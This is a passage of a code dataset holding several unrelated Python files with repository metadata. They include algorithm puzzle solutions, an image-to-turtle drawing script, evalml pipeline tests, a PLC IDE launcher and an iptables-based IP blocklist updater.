length):\n if (t != operator_str[i]) or (i == length - 1):\n splt = \" \" + t + \" \"\n\n ret = ret + splt.join(sorted(num_str[pos:i])) + splt\n print(ret)\n t = operator_str[i]\n print(\"t:%s\" % t)\n pos = i\n ret = ret + num_str[-1]\n return ret\n\nif __name__ == \"__main__\":\n string = input().strip()\n s = Solution()\n ret = s.transfor(string)\n print(ret)","repo_name":"Lcoderfit/Introduction-to-algotithms","sub_path":"二、招聘笔试题/2019秋招笔试/1.滴滴转换算式.py","file_name":"1.滴滴转换算式.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"7354912614","text":"from PIL import Image\nimport turtle as t\n# Set the image name and path\nimage_name = 'bgrd.gif'\nprecision = 1 # 1 = all pixels, 2 = every two pixel, 3 = every third pixel, etc.\nassert precision > 0, 'precision must be > 0'\nassert type(precision) == int, 'precision must be an integer'\n\n# Open the image\nim = Image.open(image_name)\nprint(f'importing {image_name} ({im.format} image) of size {im.size}')\nim_lraw = list(im.getdata())\nim_list = [im_lraw[i:i+im.size[0]:precision] for i in range(0,im.size[0]*im.size[1],im.size[0])][::precision]\nprint(f'imported {im.size[0]*im.size[1]//precision} pixels',f'over {im.size[0]*im.size[1]} pixels' if precision > 1 else '')\nim_palette = im.getpalette()\nim_colors = [tuple(im_palette[i:i+3]) for i in range(0,len(im_palette),3)]\nprint(f'found {len(im_colors)} colors in the image')\nbgcolor = im_colors[0] # background color, first color in the list == most common color\nprint(f'background color is {bgcolor}')\n#im = None # free memory (not really necessary)\nprint('generating turtle code (this may take a while)...')\nim_list_text = 'bgrd_list=['+','.join(['['+','.join(map(str,im_list[i]))+']' for i in range(len(im_list))])+']'\nim_colors_text = 'bgrd_colors=['+','.join(['('+','.join(map(str,im_colors[i]))+')' for i in range(len(im_colors))])+']'\nim_text = im_list_text+'\\n'+im_colors_text\n\nbg = t.Turtle()\nt.setup(im.size[0],im.size[1])\nt.colormode(255)\nt.tracer(0)\nbg.hideturtle()\n# Set the background color\nbg.color(bgcolor)\nbg.goto(-im.size[0]//2,-im.size[1]//2)\nbg.down()\nbg.begin_fill()\nbg.forward(im.size[0])\nbg.left(90)\nbg.forward(im.size[1])\nbg.left(90)\nbg.forward(im.size[0])\nbg.left(90)\nbg.forward(im.size[1])\nbg.left(90)\nbg.end_fill()\nbg.up()\n# Draw the image\nbt = t.Turtle()\nbt.hideturtle()\nbt.up()\nbt.goto(-im.size[0]//2,im.size[1]//2)\nt.update()\nfor i in range(len(im_list)):\n for j in range(len(im_list[i])):\n c = im_colors[im_list[i][j]]\n if c:\n bt.down()\n bt.color(c)\n bt.forward(1)\n bt.up()\n else:\n bt.goto(bt.xcor()+1,bt.ycor())\n bt.up()\n bt.goto(-im.size[0]//2,im.size[1]//2-i-1)\n t.update()\nt.exitonclick()\n","repo_name":"Loic-An/allumettes","sub_path":"old/imgtoturtle.py","file_name":"imgtoturtle.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29938578867","text":"\ndef license_plate(s, n):\n chars = [char for char in s.upper() if char != '-']\n m = len(chars)\n r = m%n\n \n pieces = ([chars[:r]] if r else []) + [chars[i:i+n] for i in range(r,m,n)]\n \n return '-'.join([''.join(piece) for piece in pieces])\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"HTaZiWnsCGgehpgdr_18.py","file_name":"HTaZiWnsCGgehpgdr_18.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25490763573","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/minimum-falling-path-sum/\n# Author: Miao Zhang\n# Date: 2021-03-26\n\nclass Solution:\n def minFallingPathSum(self, matrix: List[List[int]]) -> int:\n while len(matrix) >= 2:\n row = matrix.pop()\n for j in range(len(row)):\n matrix[-1][j] += min(row[max(0, j - 1): min(len(row), j + 2)])\n return min(matrix[0])\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/minimumFallingPathSum/minimumFallingPathSum.py","file_name":"minimumFallingPathSum.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39919616916","text":"# Написать функцию balanced_num, которая определяет является ли заданное число сбалансированным, т.е.\n# сумма цифр справа и слева от середины равны (abcde ==> a + b == d + e; abcdef ==> a + b == e + f)\n#\n# Примеры:\n# balanced_num(2222) ==> True\n# balanced_num(135622) ==> True\n\nimport traceback\n\n\ndef balanced_num(number):\n number_str = str(number) # Преобразовываем число в строку\n if len(number_str) <= 1: # Если длина 1, то сразу возращаем true\n return True\n else:\n middle = len(number_str) // 2 # Ищём середину\n\n # У нас в любом случае массивы разделятся на равные, если количество элементов\n # было не чётное, то средний элемент просто не будет учитываться\n a1 = number_str[:middle] # От начала до середины\n if len(number_str) % 2 == 1: # Если число чётное, то используем все элементы, если нет, игнорируем центральный\n a2 = number_str[(middle + 1):] # Не учитываем центральный элемент\n else:\n a2 = number_str[middle:] # Учитываем все\n sum1 = 0\n sum2 = 0\n for i in range(len(a1)):\n sum1 += int(a1[i])\n sum2 += int(a2[i])\n if sum1 == sum2:\n return True\n else:\n return False\n\n\n# Тесты\ntry:\n assert balanced_num(13) == False\n assert balanced_num(0) == True\n assert balanced_num(295591) == False\n assert balanced_num(56239814) == False\n assert balanced_num(1230987) == False\nexcept AssertionError:\n print(\"TEST ERROR\")\n traceback.print_exc()\nelse:\n print(\"TEST PASSED\")\n","repo_name":"MBC-Studio/Introductory_practice_A_04XTodO70bzRjdO006k","sub_path":"task_A101.py","file_name":"task_A101.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36022406701","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 13 13:32:54 2020\r\n\r\n@author: Ravi\r\n\"\"\"\r\n\r\ndef cout(arr,k,n):\r\n e = 100\r\n current = 0\r\n tempCurrent = None\r\n while(tempCurrent!=0):\r\n i = arr[(current+k)%n]\r\n if i==0:\r\n e = e-1\r\n else:\r\n e = e-3\r\n tempCurrent = (current+k)%n\r\n current+=k\r\n print(e)\r\nn,k = map(int,input().split())\r\narr = list(map(int,input().split()))\r\ncout(arr,k,n)","repo_name":"RaviPabari/HackerRank-Problems","sub_path":"Jumping Clouds Revisited.py","file_name":"Jumping Clouds Revisited.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"5602945199","text":"C = int(input())\ncase_num = 0\nwhile True:\n N_li = list(map(int, input().split(' ')))\n N = N_li[0]\n average = (sum(N_li)-N) / N\n student_num = []\n for i in range(1, N+1):\n if N_li[i] > average:\n student_num.append(N_li[i])\n ratio = 100*(len(student_num) / N)\n print(format(ratio, \".3f\"), \"%\", sep='')\n case_num += 1\n if case_num >= C:\n break","repo_name":"minjoo999/Algorithm","sub_path":"백준/Bronze/4344. 평균은 넘겠지/평균은 넘겠지.py","file_name":"평균은 넘겠지.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11522273969","text":"from itertools import product\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom pandas.testing import assert_index_equal\n\n\n@pytest.mark.parametrize(\"problem_type\", [\"binary\", \"multi\"])\ndef test_new_unique_targets_in_score(\n X_y_binary,\n logistic_regression_binary_pipeline,\n X_y_multi,\n logistic_regression_multiclass_pipeline,\n problem_type,\n):\n if problem_type == \"binary\":\n X, y = X_y_binary\n pipeline = logistic_regression_binary_pipeline\n objective = \"Log Loss Binary\"\n elif problem_type == \"multi\":\n X, y = X_y_multi\n pipeline = logistic_regression_multiclass_pipeline\n objective = \"Log Loss Multiclass\"\n pipeline.fit(X, y)\n with pytest.raises(ValueError, match=\"y contains previously unseen labels\"):\n pipeline.score(X, pd.Series([4] * len(y)), [objective])\n\n\n@pytest.mark.parametrize(\"num_unique\", [1, 2, 3])\n@pytest.mark.parametrize(\"pipeline\", [\"binary\", \"multiclass\"])\ndef test_invalid_targets_classification_pipeline(\n num_unique,\n pipeline,\n dummy_binary_pipeline,\n dummy_multiclass_pipeline,\n):\n X = pd.DataFrame([i for i in range(30)])\n\n if num_unique == 1:\n y = pd.Series([1 for i in range(30)])\n elif num_unique == 2:\n y = pd.Series([i % 2 for i in range(30)])\n elif num_unique == 3:\n y = pd.Series([i % 3 for i in range(30)])\n\n if pipeline == \"binary\":\n mock_binary_pipeline = dummy_binary_pipeline\n if num_unique in [1, 3]:\n with pytest.raises(\n ValueError,\n match=\"Binary pipelines require y to have 2 unique classes!\",\n ):\n mock_binary_pipeline.fit(X, y)\n else:\n assert mock_binary_pipeline.fit(X, y)\n elif pipeline == \"multiclass\":\n mock_multi_pipeline = dummy_multiclass_pipeline\n if num_unique in [1, 2]:\n with pytest.raises(\n ValueError,\n match=\"Multiclass pipelines require y to have 3 or more unique classes!\",\n ):\n mock_multi_pipeline.fit(X, y)\n else:\n assert mock_multi_pipeline.fit(X, y)\n\n\n@pytest.mark.parametrize(\n \"problem_type,use_ints\",\n product([\"binary\", \"multi\"], [True, False]),\n)\ndef test_pipeline_has_classes_property(\n breast_cancer_local,\n wine_local,\n logistic_regression_binary_pipeline,\n logistic_regression_multiclass_pipeline,\n problem_type,\n use_ints,\n):\n if problem_type == \"binary\":\n X, y = breast_cancer_local\n pipeline = logistic_regression_binary_pipeline\n if use_ints:\n y = y.map({\"malignant\": 0, \"benign\": 1})\n answer = [0, 1]\n else:\n answer = [\"benign\", \"malignant\"]\n elif problem_type == \"multi\":\n X, y = wine_local\n pipeline = logistic_regression_multiclass_pipeline\n if use_ints:\n y = y.map({\"class_0\": 0, \"class_1\": 1, \"class_2\": 2})\n answer = [0, 1, 2]\n else:\n answer = [\"class_0\", \"class_1\", \"class_2\"]\n\n # Check that .classes_ is None before fitting\n assert pipeline.classes_ is None\n\n pipeline.fit(X, y)\n assert pipeline.classes_ == answer\n\n\ndef test_woodwork_classification_pipeline(\n breast_cancer_local,\n logistic_regression_binary_pipeline,\n):\n X, y = breast_cancer_local\n mock_pipeline = logistic_regression_binary_pipeline\n mock_pipeline.fit(X, y)\n assert not pd.isnull(mock_pipeline.predict(X)).any()\n assert not pd.isnull(mock_pipeline.predict_proba(X)).any().any()\n\n\n@pytest.mark.parametrize(\n \"index\",\n [\n list(range(-5, 0)),\n list(range(100, 105)),\n [f\"row_{i}\" for i in range(5)],\n pd.date_range(\"2020-09-08\", periods=5),\n ],\n)\n@pytest.mark.parametrize(\"problem_type\", [\"binary\", \"multi\"])\ndef test_pipeline_transform_and_predict_with_custom_index(\n index,\n problem_type,\n logistic_regression_binary_pipeline,\n logistic_regression_multiclass_pipeline,\n):\n X = pd.DataFrame(\n {\"categories\": [f\"cat_{i}\" for i in range(5)], \"numbers\": np.arange(5)},\n index=index,\n )\n X.ww.init(logical_types={\"categories\": \"categorical\"})\n\n if problem_type == \"binary\":\n y = pd.Series([0, 1, 1, 1, 0], index=index)\n pipeline = logistic_regression_binary_pipeline\n elif problem_type == \"multi\":\n y = pd.Series([0, 1, 2, 1, 0], index=index)\n pipeline = logistic_regression_multiclass_pipeline\n pipeline.fit(X, y)\n\n predictions = pipeline.predict(X)\n predict_proba = pipeline.predict_proba(X)\n\n assert_index_equal(predictions.index, X.index)\n assert_index_equal(predict_proba.index, X.index)\n","repo_name":"alteryx/evalml","sub_path":"evalml/tests/pipeline_tests/classification_pipeline_tests/test_classification.py","file_name":"test_classification.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":664,"dataset":"github-code","pt":"32"} +{"seq_id":"2879855508","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__version__ = \"$Revision$\"\n\nimport __builtin__\nimport gettext\nimport os\nimport sys\n\ngettext.install('yaplcide') # this is a dummy to prevent gettext falling down\n\n_dist_folder = os.path.split(sys.path[0])[0]\n_beremiz_folder = os.path.join(_dist_folder, \"beremiz\")\n#Ensure that Beremiz things are imported before builtins and libs.\nsys.path.insert(1,_beremiz_folder)\n\nfrom Beremiz import *\n\nclass YAPLCIdeLauncher(BeremizIDELauncher):\n \"\"\"\n YAPLC IDE Launcher class\n \"\"\"\n def __init__(self):\n BeremizIDELauncher.__init__(self)\n self.yaplc_dir = os.path.dirname(os.path.realpath(__file__))\n self.splashPath = self.YApath(\"images\", \"splash.png\")\n self.extensions.append(self.YApath(\"yaplcext.py\"))\n\n import features\n # Let's import nucleron yaplcconnectors\n import yaplcconnectors\n import connectors\n\n connectors.connectors.update(yaplcconnectors.connectors)\n\n # Import Nucleron yaplctargets\n import yaplctargets\n import targets\n\n targets.toolchains.update(yaplctargets.toolchains)\n targets.targets.update(yaplctargets.yaplctargets)\n\n features.libraries = [\n\t ('Native', 'NativeLib.NativeLibrary')]\n \n features.catalog.append(('yaplcconfig',\n _('YAPLC Configuration Node'),\n _('Adds template located variables'),\n 'yaplcconfig.yaplcconfig.YAPLCNodeConfig'))\n\n def YApath(self, *args):\n return os.path.join(self.yaplc_dir, *args)\n\n\n# This is where we start our application\nif __name__ == '__main__':\n beremiz = YAPLCIdeLauncher()\n beremiz.Start()\n","repo_name":"nucleron/IDE","sub_path":"yaplcide.py","file_name":"yaplcide.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"25656332897","text":"\"\"\"\nThis module adds the IPs in the Blacklisted_IP from data folder and exclude the whitelisted_ips into the firewall\n\"\"\"\n\nimport csv\nimport os\nimport platform\nimport signal\nimport json\nimport time\nimport subprocess\nimport re\nfrom tqdm import tqdm\nimport signal\nimport sys\n\nSOFTWARE_DIR=os.getcwd()\nCONFIG=\"configurations/firewall_updater_config.json\"\nCHAIN_NAME=\"BLOCK_IPS_IP_Protect\"\n\ndef signal_handler(sig, frame):\n \"\"\"\"Signal handler for SIGINT\"\"\"\n print(\"\\n\\n\\033[1mProcess interrupted by user\\033[0m\")\n sys.exit(0)\n\ndef block_ip_firewall():\n \"\"\"Block the IPs in the firewall using Blacklisted_IP.csv\"\"\"\n\n print(\"\\033[1mPlease enter the password for sudo if prompted, (enter within 30 seconds)\\033[0m\")\n if os.system(\"sudo -v\") != 0:\n # set a 30-second timeout to wait for user input\n def handler(signum, frame):\n raise Exception(\"30 seconds elapsed, password not entered\")\n \n signal.signal(signal.SIGALRM, handler)\n signal.alarm(30)\n \n try:\n # Ask for sudo password\n os.system(\"sudo -v\")\n \n # Reset the alarm\n signal.alarm(0)\n except Exception as e:\n print(str(e))\n return\n if os.system(\"sudo -v\") != 0:\n print(\"Run the script with sudo privileges\")\n exit()\n print(\"Updating firewall rules with the latest IPs to be blocked...\")\n\n # Specify the folder to the CSV files containing the IPs to be blocked\n csvs_folders=os.path.join(os.getcwd(),'data')\n\n # Join all the CSV files in the folder into a single CSV file (removing the header row from all thefiles except the first one)\n FOLDERS_CSVS_TO_BE_NOT_ADDED=[]\n with open (CONFIG, 'r') as f:\n data = json.load(f)\n stack = [data]\n while stack:\n current = stack.pop()\n if isinstance(current, dict):\n for key, value in current.items():\n if isinstance(value, bool) and value is False:\n FOLDERS_CSVS_TO_BE_NOT_ADDED.append(key)\n elif isinstance(value, dict):\n stack.append(value)\n\n IP_to_be_blocked = []\n for root, dirs, files in os.walk(csvs_folders):\n if 'whitelisted_ip' in dirs:\n dirs.remove('whitelisted_ip') # Exclude the \"whitelisted_ip\" directory from further traversal\n for dir in FOLDERS_CSVS_TO_BE_NOT_ADDED:\n if dir in dirs:\n dirs.remove(dir)\n for file in files:\n if file.endswith('.csv'):\n with open(os.path.join(root, file), 'r') as infile:\n reader = csv.reader(infile)\n rows = [row for row in reader] # Read all rows of the CSV\n if len(rows) > 1:\n IP_to_be_blocked += [row[0] for row in rows[1:]] # Skip the first row\n\n #whitelisted IPs\n whitelisted_ip=[]\n with open(os.path.join(SOFTWARE_DIR,'data','whitelisted_ip','whitelist.csv'), 'r') as infile:\n reader = csv.reader(infile)\n rows=[row for row in reader] #Read all rows of the CSV \n if len(rows)>1:\n whitelisted_ip+=[row[0] for row in rows[1:]] #Skip the first row\n\n #excluding whitelist IPs from IP_to_be_blocked\n IP_to_be_blocked = [ip for ip in IP_to_be_blocked if ip not in whitelisted_ip]\n print(\"Total IPs to be added to firewall: \", len(IP_to_be_blocked))\n\n # The name of the firewall chain to add the rules to\n chain_name = CHAIN_NAME\n\n # check if the chain not already exists\n current_platform = platform.system()\n chain_name_present = False\n\n if current_platform == 'Linux':\n # Get all the chain names using the iptables command and regex\n command = \"sudo iptables -L -n\"\n output = subprocess.check_output(command, shell=True).decode('utf-8')\n chain_names = re.findall(r\"Chain\\s(\\w+)\", output)\n\n # Check if the chain already exists in the list of chain names\n if chain_name in chain_names:\n chain_name_present = True\n else:\n # If the chain name does not exist, create it\n command = f'sudo iptables -N {chain_name}'\n subprocess.call(command, shell=True)\n print(f\"Firewall RuleChain-, Chain '{chain_name}' created successfully.\")\n \n # Set the signal handler for SIGINT\n signal.signal(signal.SIGINT, signal_handler)\n\n print(f\"Adding rules to firewall chain '{chain_name}'...\")\n # Your existing code\n print(\"\\033[1mPlease ignore legacy host/network error, if any\\033[0m\")\n print(\"Total rules to be added: \", len(IP_to_be_blocked))\n ETA=round(len(IP_to_be_blocked)/50)\n print(f\"This will take a while , between {ETA/4} to {ETA} seconds on normal computers\")\n\n ##################[Windows and MacOS support is under development]################\n print(\"\\033[1mPlease see the update progress of adding rules to firewall below\\033[0m\")\n # Loop through the IP addresses and add each one to the firewall chain\n with tqdm(total=len(IP_to_be_blocked)) as pbar:\n for ip_address in IP_to_be_blocked:\n # Block IPs on Linux-based systems using iptables\n if current_platform == 'Linux':\n os.system(f'sudo iptables -A {chain_name} -s {ip_address} -j DROP')\n # # Block IPs on macOS using pfctl\n # elif current_platform == 'Darwin':\n # os.system(f'sudo pfctl -t {chain_name} -T add {ip_address}')\n # # Block IPs on Windows using PowerShell\n # elif current_platform == 'Windows':\n # os.system(f'powershell.exe New-NetFirewallRule -DisplayName \"Block {ip_address}\" -Direction Inbound -LocalAddress Any -RemoteAddress {ip_address} -Action Block')\n else:\n print(f'Error: Platform \"{current_platform}\" not supported')\n sys.exit(1)\n pbar.update(1)\n print(\"\\033[1mFirewall rules added successfully, please ignore legacy host/network error, if any\\033[0m\")\n\n\ndef unblock_ip_firewall():\n \"\"\"Remove the IPs in the firewall using Blacklisted_IP.csv(This is done to remove the IPs which were defined by old Blacklisted_IPs)\"\"\"\n\n print(\"\\033[1mPlease enter the password for sudo if prompted, (enter within 30 seconds)\\033[0m\")\n #if sudo is not already cached\n if os.system(\"sudo -v\") != 0:\n # set a 30-second timeout to wait for user input\n def handler(signum, frame):\n raise Exception(\"30 seconds elapsed, password not entered\")\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(30)\n try:\n # Ask for sudo password\n os.system(\"sudo -v\")\n # Reset the alarm\n signal.alarm(0)\n except Exception as e:\n print(str(e))\n return\n \n if os.system(\"sudo -v\") != 0:\n print(\"Run the script with sudo privileges\")\n exit()\n print(\"Deleting firewall rules of the previous Blocked_IPs...\")\n\n # Specify the folder to the CSV files containing the IPs to be unblocked\n csvs_folders = os.path.join(SOFTWARE_DIR, 'Blacklisted_IP')\n\n # The name of the firewall chain to add the rules to\n chain_name = CHAIN_NAME\n\n # check if the chain not already exists\n current_platform = platform.system()\n chain_name_present = False\n\n if current_platform == 'Linux':\n # Get all the chain names using the iptables command and regex\n command = \"sudo iptables -L -n\"\n output = subprocess.check_output(command, shell=True).decode('utf-8')\n chain_names = re.findall(r\"Chain\\s(\\w+)\", output)\n\n # Check if the chain already exists in the list of chain names\n if chain_name in chain_names:\n chain_name_present = True\n else:\n # If the chain name does not exist, create it\n command = f'sudo iptables -N {chain_name}'\n subprocess.call(command, shell=True)\n print(f\"Firewall RuleChain-, Chain '{chain_name}' created successfully.\")\n\n\n ########################[Windows and MacOS support is under development]################\n # Get the current platform\n current_platform = platform.system()\n # Delete all rules in the chain\n if current_platform == 'Linux':\n os.system(f'sudo iptables -F {chain_name}')\n os.system(f'sudo iptables -X {chain_name}')\n # elif current_platform == 'Darwin':\n # os.system(f'sudo pfctl -t {chain_name} -T flush')\n # elif current_platform == 'Windows':\n # os.system(f'powershell.exe Remove-NetFirewallRule -DisplayName \"Block all {chain_name}\"')\n else:\n print(f'Error: Platform \"{current_platform}\" not supported')\n print(f\"\\033[1mAll Firewall rules in {chain_name} chain deleted successfully\\033[0m\")\n\nif __name__=='__main__':\n if(len(sys.argv)>1):\n SOFTWARE_DIR=sys.argv[1]\n CONFIG = os.path.join(SOFTWARE_DIR,CONFIG)\n unblock_ip_firewall()\n block_ip_firewall()","repo_name":"prakharguptaujjain/IP_protect","sub_path":"utils/firewall_updater/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9133,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"70731169371","text":"from email.policy import default\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import nullslast\n\ndb = SQLAlchemy()\n\n\ndef connect_db(app):\n db.app = app\n db.init_app(app)\n app.app_context().push()\n\n# MODELS GO HERE\n\n\nclass Pet(db.Model):\n \"\"\"Department Model --> Each department has multiple employees\"\"\"\n\n __tablename__ = 'pets'\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n name = db.Column(db.Text, nullable=False)\n species = db.Column(db.Text, nullable=False)\n image_url = db.Column(db.Text)\n age = db.Column(db.Integer)\n notes = db.Column(db.Text)\n available = db.Column(db.Boolean, nullable=False, default=True)\n","repo_name":"johnathan-booy/Adopt","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14378892571","text":"import sys\nimport os\nimport re\n\nsys.path.append(os.path.join(os.path.join(sys.path[0], '..'), 'bitstream'))\nfrom chips import ChipWithID, ChipOrPackageNamed\nfrom utils import string_to_bits, bits_to_string\n\nif len(sys.argv) < 3:\n print(\"usage: %s [device_id]\" % sys.argv[0])\n sys.exit(-1)\n \n\n#\n# Create bits for the bitstream\n#\nif len(sys.argv) < 4:\n chip = ChipWithID(0x00120010)\nelse:\n chip = ChipOrPackageNamed(sys.argv[3])\n\nbits_by_tile = []\nfor col in range(0, chip.columns):\n col_bits = []\n for row in range(0, chip.rows):\n tile = chip.tile_at(col, row)\n if tile is None:\n col_bits.append([])\n else:\n col_bits.append(tile.empty_bits())\n bits_by_tile.append(col_bits)\n\nbits_by_config = []\nfor chain in chip.configChain:\n bits_by_config.append(chain.empty_bits())\n\n#\n# Read the fasm file\n#\nfilename = sys.argv[1]\nwith open(filename, \"r\") as file:\n lines = file.readlines()\n\nuseFormatters = True\nfor line in lines:\n line = line.strip()\n if len(line) == 0:\n continue\n if line[0] == \"#\":\n if line == \"#nofmt!\":\n useFormatters = False\n elif line == \"#fmt!\":\n useFormatters = True\n continue\n \n match = re.match(\"^([^_]*)_([XY]-?[0-9]*)([XY]-?[0-9]*).(.*)$\", line)\n assert match is not None\n \n comps = match.groups()\n assert len(comps) == 4\n \n row = None\n col = None\n for comp_index in range(1,3):\n coordinate = comps[comp_index]\n if coordinate[0] == 'X':\n col = int(coordinate[1:])\n elif coordinate[0] == 'Y':\n row = int(coordinate[1:])\n \n assert row is not None\n assert col is not None\n \n setting = comps[3].split(\"=\")\n if len(setting) == 1:\n setting.append(\"1\")\n \n key = setting[0].strip()\n if key[-1] == \"]\":\n openb = key.rfind(\"[\")\n key = key[0:openb]\n value = string_to_bits(setting[1].strip())\n \n if row < 0 and comps[0] == 'C':\n chain_idx = col\n success = chip.configChain[chain_idx].encode(chip, None, None, None, key, value, bits_by_config[chain_idx])\n assert success;\n continue;\n \n tile = chip.tile_at(col, row)\n assert tile is not None\n assert tile.type[0] == comps[0]\n \n bits = bits_by_tile[col][row]\n success = tile.encode(key, value, bits, useFormatters) \n if success:\n if useFormatters:\n if key.startswith(\"TileClkMUX\"):\n # In af bitstreams, used logic tiles get this key/value set..\n value = [0,0,0,1]\n tile.encode(\"TileAsyncMUX00\", value, bits)\n elif key.startswith(\"alta_slice\") and key.endswith(\"INIT[15:0]\"):\n key = key[:-11] + \"_CARRY_CRL\"\n tile.encode(key, [1], bits)\n else:\n chain_idx = 0\n for chain in chip.configChain:\n success = chain.encode(chip, tile.type, row, col, key, value, bits_by_config[chain_idx])\n if success:\n break\n chain_idx += 1\n \n if not success:\n print(\"Did not enocde key:%s line:%s\" % (key, line))\n \n # Hack to fix I/O\n if useFormatters and key.startswith(\"alta_rio\") and key.endswith(\"OUTPUT_USED\"):\n slice = int(key[8:10])\n if slice < 4:\n for x in range (1, 4):\n name = \"IOMUX%02i\" % (slice + (4 * x))\n bit_len = len(tile.values[name])\n tile.encode(name, [0] * bit_len, bits, False)\n\n\n#\n# Write the ASC file\n#\nasc = open(sys.argv[2], 'w')\nasc.write(\".device 0x%x\\n\\n\" % chip.device_id)\n\nchain_idx = 0\nfor chain in bits_by_config:\n asc.write(\".config_chain %i\\n\" % (chain_idx))\n asc.write(bits_to_string(bits_by_config[chain_idx]))\n asc.write(\"\\n\\n\")\n chain_idx += 1\n\nfor tile_col in range(0, chip.columns):\n for tile_row in range(0, chip.rows):\n tile = chip.tile_at(tile_col, tile_row)\n if tile is None:\n continue\n asc.write(\".%s %i %i\\n\" % (tile.type, tile_col, tile_row))\n bits = bits_by_tile[tile_col][tile_row]\n bit_idx = 0\n for bit_row in range(0, tile.bitstream_height):\n row_str = \"\"\n for bit_col in range(0, tile.bitstream_width):\n row_str += str(bits[bit_idx])\n bit_idx += 1\n asc.write(row_str)\n asc.write(\"\\n\")\n asc.write(\"\\n\")\nasc.close()","repo_name":"pablomarx/rodinia","sub_path":"nextpnr/fasm_pack.py","file_name":"fasm_pack.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"} +{"seq_id":"43053746499","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport json\nimport datetime\nfrom datetime import datetime as dt\nfrom collections import OrderedDict\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-f\", \"--file\",\n type = str,\n dest = \"path\",\n required = True,\n help = \"The path of the time-recorded file (*.json)\"\n )\n\n parser.add_argument(\n \"-d\", \"--day\",\n type = str,\n dest = \"day\",\n default =None,\n help = \"Select date to calculate\"\n )\n\n parser.add_argument(\n \"-p\", \"--plot\",\n type = bool,\n dest = \"plot\",\n default = False,\n const = True,\n nargs=\"?\",\n help = \"Display all data as a pie chart\"\n )\n\n parser.add_argument(\n \"-n\", \"--newplot\",\n type = bool,\n dest = \"new_plot\",\n default = False,\n const = True,\n nargs=\"?\",\n help = \"Display new format json file all data as a pie chart\"\n )\n\n return parser\n\n\ndef mk_dict(pairs):\n ret_dict = OrderedDict()\n for elem in pairs:\n ret_dict[elem[0]] = ret_dict[elem[0]] + \",\" + elem[1] if elem[0] in ret_dict else elem[1]\n return ret_dict\n\n\ndef read_json(path):\n fp = open(path, \"r\", encoding=\"utf-8\")\n json_dict = json.load(fp, object_pairs_hook=mk_dict)\n return json_dict\n\n\ndef calc_time(str_time):\n del_t = datetime.timedelta();\n str_time = str_time.split(\",\")\n for s_time in str_time:\n t_elem = s_time.split(\"-\")\n del_t += dt.strptime(t_elem[1], \"%H:%M\") - dt.strptime(t_elem[0], \"%H:%M\")\n return del_t\n\ndef new_format_calc_time(str_time):\n del_t = datetime.timedelta();\n for s_time in str_time:\n t_elem = s_time.split(\"-\")\n del_t += dt.strptime(t_elem[1], \"%H:%M\") - dt.strptime(t_elem[0], \"%H:%M\")\n return del_t\n\ndef summarize(use_data):\n data = OrderedDict()\n for key in use_data:\n t_del = calc_time(use_data[key])\n minute = t_del.seconds//(60)\n t = datetime.time(hour=minute//60, minute=minute%(60))\n work_name = key.split(\"/\", 1)\n if work_name[0] in data:\n data[work_name[0]].append([work_name[1], t])\n else:\n if len(work_name) == 1:\n data[work_name[0]] = t\n else:\n data[work_name[0]] = [[work_name[1], t]]\n return data\n\ndef output(data):\n for key in data:\n if type(data[key]) == list:\n print(\"* {0}\".format(key))\n for elem in data[key]:\n msg = \" ** {0}: {1}h{2}m\"\n if elem[1].hour == 0:\n msg = \" ** {0}: {2}m\"\n elif elem[1].minute == 0:\n msg = \" ** {0}: {1}h\"\n print(msg.format(elem[0], elem[1].hour, elem[1].minute))\n else:\n msg = \"* {0}: {1}h{2}m\"\n if data[key].hour == 0:\n msg = \"* {0}: {2}m\"\n elif data[key].minute == 0:\n msg = \"* {0}: {1}h\"\n print(msg.format(key, data[key].hour, data[key].minute))\n\ndef aggregate(all_data):\n ret_data = {}\n for day in all_data:\n data_elem = all_data[day]\n for subj_key in data_elem:\n subj = subj_key.split(\"/\")[0]\n t = calc_time(data_elem[subj_key])\n ret_data[subj] = ret_data[subj] + t if subj in ret_data else t\n return ret_data\n\n\ndef hex2color(hex_c):\n return [int(hex_c[1:3],16)/256.0,int(hex_c[3:5],16)/256.0,int(hex_c[5:7],16)/256.0,1]\n\n\ndef plot(all_data):\n import numpy as np\n import matplotlib.pyplot as 